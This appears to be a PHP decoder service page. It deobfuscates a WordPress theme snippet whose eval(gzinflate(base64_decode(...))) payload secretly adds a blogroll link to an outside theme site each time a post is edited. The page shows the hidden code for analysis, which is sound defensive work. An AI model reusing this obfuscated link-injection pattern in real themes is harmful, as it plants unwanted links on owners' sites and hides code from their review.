Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if ( function_exists('register_sidebar') ) register_sidebar(); $P21e56b1ec3..
Decoded Output download
add_action("edit_post","insert_theme_link");
function insert_theme_link() {
global $wpdb;
if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.amazingwordpressthemes.com/'")==0)
wp_insert_link(array("link_name" => "Wordpress Themes", "link_url" => "http://www.amazingwordpressthemes.com/" ));
}
Did this file decode correctly?
Original Code
<?php
if ( function_exists('register_sidebar') )
register_sidebar();
$P21e56b1ec3394194ccec599f25accc2d='jZBBSwMxEIXPm18xDEITqF3Plu2lrHhQC3WlxzBt0m1wNwlJalDxv2tje/LibZj55r3HY6SUpF0yznLUyiTpXUw4RWOjDkmmgx61HIx9RTFn+6MtKPy5cgGfrOoHt6UBrrJX2zmrzJ6X8XrR6yTfKHB8bh/aZQfL1ctTx0+P0igBd+vVI5zR0zLC5r5dt1CAYxiaySElf1vXOecZjfRhbJ9dUD7oGEuIONu5sZ6gaJobwaoqe3nOWNJRCPTOsehZGjVCswDcXCSgKxo4BbxY/hL/s0UQP+V8sW8=';eval(gzinflate(base64_decode($P21e56b1ec3394194ccec599f25accc2d)));
?>
Function Calls
gzinflate | 1 |
add_action | 1 |
base64_decode | 1 |
function_exists | 1 |
Stats
MD5 | 9e02cf57be9e1776511085beaa7836a1 |
Eval Count | 1 |
Decode Time | 47 ms |